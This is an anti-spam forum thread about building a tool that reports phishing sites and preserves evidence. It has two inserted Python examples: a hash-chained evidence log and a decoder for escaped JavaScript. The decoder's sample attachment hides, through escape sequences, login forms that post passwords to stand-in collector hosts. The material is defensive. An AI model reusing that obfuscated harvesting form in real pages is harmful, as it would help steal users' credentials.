automated tool for phishing reporting


All times are UTC - 5 hours [ DST ]


 PostPosted: Mon Sep 21, 2009 6:35 pm   
Spammer Exterminator

Joined: Wed May 02, 2007 8:59 pm
Posts: 1055
Taking pieces of code from xComplaint, I'm writing an automated tool for phishing reporting.
It will automatically discern whether a web site is cracked or is a phish domain (just registered), recover the host or registrar, and so on.
My idea is also to keep track of all received links, and periodically check if they are suspended.

The first version will be a bash script, the next will be compiled C, and the last C with a GUI.


 PostPosted: Mon Sep 21, 2009 7:44 pm   
Site Admin

Joined: Tue May 09, 2006 9:18 am
Posts: 5022
Definitely keep us updated. I have a gaggle of people who would use this on a daily basis.

SiL


 PostPosted: Tue Sep 22, 2009 10:08 pm   
Spammers' Nightmare

Joined: Thu Apr 05, 2007 4:10 pm
Posts: 2777
Nice, just caught this post, efa. Thank you for your contribution. I look forward to seeing it later. :)


 PostPosted: Tue Sep 22, 2009 11:17 pm   
You are kiillllling-a my bizinisss!

Joined: Thu Mar 01, 2007 3:01 am
Posts: 5915
I don't know how complex the programming would be, but a program that would save a timestamped copy of the data would help replace what Castlecops's PIRT was doing, as far as saving data for law enforcement.


 PostPosted: Thu Sep 24, 2009 3:25 pm   
Spammer Exterminator

Joined: Wed May 02, 2007 8:59 pm
Posts: 1055
AlphaCentauri wrote:
a program that would save a timestamped copy of the data

Are you speaking about saving the phish email or saving the phish web site?


 PostPosted: Thu Sep 24, 2009 4:51 pm   
You are kiillllling-a my bizinisss!

Joined: Thu Mar 01, 2007 3:01 am
Posts: 5915
efa wrote:
AlphaCentauri wrote:
a program that would save a timestamped copy of the data

Are you speaking about saving the phish email or saving the phish web site?


Saving anything that would be useful in court if someone gets arrested -- documenting the email with headers to show he violated the law using someone else's computer to mail it and that there were false statements in the message, document the hosting and registration information, document the content of the sites -- if you can do all of it, you're recreating PIRT, which a lot of people would like to see happen. The question is where to store the data, how much you can store, how to do it so it can't be altered without a time stamp for legal purposes, and how to get law enforcement to take notice. Even doing part of it would be useful.

There are lots of agencies with spamtraps working with law enforcement, saving the raw spams with headers. So if we can't do everything, saving the spam is not critical. It would be useful having documentation of the registration information, nameserver information, the IP's where each was hosted, maybe some sampling of the changing IP's for fast flux, etc. Our own stored sent Complainterator reports are informal documentation, but again, they aren't as valid for legal purposes since they can be altered without it being apparent what's been done or when or by whom.


 PostPosted: Thu Sep 24, 2009 6:08 pm   
Spammer Exterminator

Joined: Wed May 02, 2007 8:59 pm
Posts: 1055
Saving phish/spam email is already done by xComplaint in the local "forwarded.txt" file, so it is easy.
Saving web pages is a little difficult, but since the last version xComplaint downloads the web pages to look for redirection links, so it is not so difficult to also save this data.
For now I use 'wget' to download web pages, as xComplaint is a CLI application, but with the GUI version I can use WebKit
http://en.wikipedia.org/wiki/WebKit
which seems faster than Gecko (the Mozilla engine).

The difficulties come from recovering all the other information, the space to save all the web sites, and a form of protection against alterations (I can't imagine a valid one).

I do not know the story behind PIRT and Castlecops (I'm interested in it), but I know that the only software that survives over time is open source.
Imagine an author who does a lot of work to write an application and keeps it closed source. Time passes, interests change. The author loses interest in further development or simply lacks time. All the good work is lost. I remember tens of applications that disappeared this way, and many others that were released as open source so they could survive.
GPL software can be further developed by other people. Imagine a collaborative work: we can reach objectives that one man alone can't.
This is the trick behind GNU and Linux: collaborative work, shared intelligence and open source. They often arrive later, but do it better and forever.


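Added example (not part of the thread, and not xComplaint or PIRT code): the two posts above ask how to store email, registration, DNS and page evidence so that it cannot be altered without that showing. One common approach is a hash-chained log, shown here in Python. The record layout, function names and sample data are assumptions made for this example.

```python
import hashlib
import json

GENESIS = "0" * 64  # "previous hash" used by the first record

def digest(entry):
    # Hash a canonical JSON form so key order cannot change the result.
    body = {k: entry[k] for k in ("seq", "time", "kind", "sha256", "prev")}
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()

def append(log, kind, payload, when):
    """Append one evidence record; returns the new head hash."""
    entry = {"seq": len(log), "time": when, "kind": kind,
             "sha256": hashlib.sha256(payload).hexdigest(),
             "prev": log[-1]["hash"] if log else GENESIS}
    entry["hash"] = digest(entry)
    log.append(entry)
    return entry["hash"]

def verify(log, payloads, trusted_head=None):
    """Return the index of the first bad record, or -1 if everything checks out."""
    prev = GENESIS
    for i, entry in enumerate(log):
        if (entry["seq"] != i or entry["prev"] != prev
                or entry["hash"] != digest(entry)
                or hashlib.sha256(payloads[i]).hexdigest() != entry["sha256"]):
            return i
        prev = entry["hash"]
    if trusted_head is not None and prev != trusted_head:
        return len(log)  # chain was truncated or rebuilt after the head was recorded
    return -1

# Constructed sample evidence; example.test and 192.0.2.10 are reserved test values.
SAMPLES = [
    ("email", b"Received: from host.example.test\r\nSubject: verify your account\r\n"),
    ("whois", b"Domain Name: phish.example.test\nCreation Date: 2009-09-20\n"),
    ("dns", b"phish.example.test. 300 IN A 192.0.2.10\n"),
]

def build_sample_log():
    log, payloads, head = [], [], GENESIS
    for n, (kind, data) in enumerate(SAMPLES):
        head = append(log, kind, data, "2009-09-24T21:5%d:00Z" % n)
        payloads.append(data)
    return log, payloads, head
```

The chain only proves order and integrity relative to a head hash held outside the archive; a party who can rewrite the whole file can rebuild it, which is why verify() accepts trusted_head. Having that head hash timestamped by an RFC 3161 timestamping authority, or published where others keep a copy, is what ties it to a date.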
 PostPosted: Sun Jun 20, 2010 7:29 pm   
Spammer Exterminator

Joined: Wed May 02, 2007 8:59 pm
Posts: 1055
I developed a piece of code to decode any escape sequences inside JavaScript embedded in HTML pages attached to emails. This is a recent technique used by phishers to hide the POST link. It will become part of xPhish. For now, xPhish will be packaged with the next version of xComplaint.


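Added example (not xPhish code, and not part of the thread): a Python version of the kind of decoder the post above describes, which undoes escape sequences inside the script blocks of an HTML attachment and lists the form targets that only become visible afterwards. The function names and the sample attachment are constructed for this example; example.test is a reserved test domain.

```python
import re
from html.parser import HTMLParser

ESCAPE = re.compile(
    r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})|%u([0-9a-fA-F]{4})"
    r"|%([0-9a-fA-F]{2})|\\([0-7]{1,3})")
SCRIPT = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)

def decode_js_escapes(text, max_rounds=5):
    """Decode \\xNN, \\uNNNN, %uNNNN, %NN and octal escapes; repeat for nested layers."""
    def repl(m):
        hexval = m.group(1) or m.group(2) or m.group(3) or m.group(4)
        return chr(int(hexval, 16)) if hexval else chr(int(m.group(5), 8))
    for _ in range(max_rounds):
        decoded = ESCAPE.sub(repl, text)
        if decoded == text:
            break
        text = decoded
    return text

class FormFinder(HTMLParser):
    """Collect (method, action) for every <form> start tag seen."""
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        if tag == "form":
            a = dict(attrs)
            self.forms.append(((a.get("method") or "get").lower(), a.get("action")))

def hidden_forms(html):
    """Return forms that only appear after decoding the page's script blocks."""
    forms = []
    for body in SCRIPT.findall(html):
        finder = FormFinder()  # fresh parser per script so one block cannot skew the next
        finder.feed(decode_js_escapes(body))
        finder.close()
        forms.extend(finder.forms)
    return forms

# Constructed sample attachment: no <form> tag is visible until the scripts are decoded.
SAMPLE = r'''<html><body>
<script>document.write(unescape('%3Cform method%3D%22post%22 action%3D%22http%3A//collector.example.test/login.php%22%3E'));</script>
<script>var f = "\x3cform method=\x22POST\x22 action=\x22http://\u0063ollector2.example.test/a.php\x22\x3e";</script>
<input name="user"><input name="pass" type="password">
</body></html>'''
```

The recovered action URLs are the links to report to the host or registrar, since the address shown in the mail itself is not where the form posts.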